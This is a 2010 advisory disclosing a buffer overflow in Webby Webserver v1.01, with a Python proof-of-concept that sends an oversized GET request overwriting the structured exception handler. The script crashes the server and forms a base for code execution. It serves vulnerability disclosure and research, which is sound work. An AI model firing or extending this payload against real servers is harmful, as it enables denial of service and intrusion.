Webby Webserver v1.01 - Buffer overflow vulnerability with overwritten structured exception handler (SEH)

[michael . messner]

---------------------------------------------



Webby Webserver v1.01

- Buffer overflow vulnerability with overwritten structured exception handler 
(SEH)

Date: 25.05.2010



---------------------------------------------



- Description



Webby is a small webserver for the windows operating system.



- buffer overflow vulnerability



The vulnerability can be triggered by sending a specially crafted HTTP GET 
request. Payload of the attached POC overwrites the SEH with NOPs.



- Solution



No known solution available.

No contact details of the author found.



- Credits



The vulnerability was discovered by Michael Messner from Integralis

michael#dot#messner#at#integralis#dot#com



- Timeline



25.05.2010 - Vulnerability discovered



- Reference



Download vulnerable software

http://www.shareware.de/webby-webserver/



- POC



#!/usr/bin/python



import socket

import sys

import os.path

import time



if len(sys.argv) < 2:

        print "Usage: webby.py <IP> <port>"

        sys.exit(0)



ips = sys.argv[1]

port = int(sys.argv[2])



string = "A"*790

string += "\x90"*4      

string += "\x42"*105            



method = "GET"

print "starting POC for:", ips

print ""



s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:

        connect=s.connect((ips, port))

except:

        print "no connection possible"

        sys.exit(1)



payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a'



print "\r\nsending payload"

print "\n\rusing methode %s with buffersize of: %s" % (method,str(len(string)))

print "..."



print payload

s.send(payload)

print "finished with method %s and payload %s" % (method,payload)

print "... check SEH"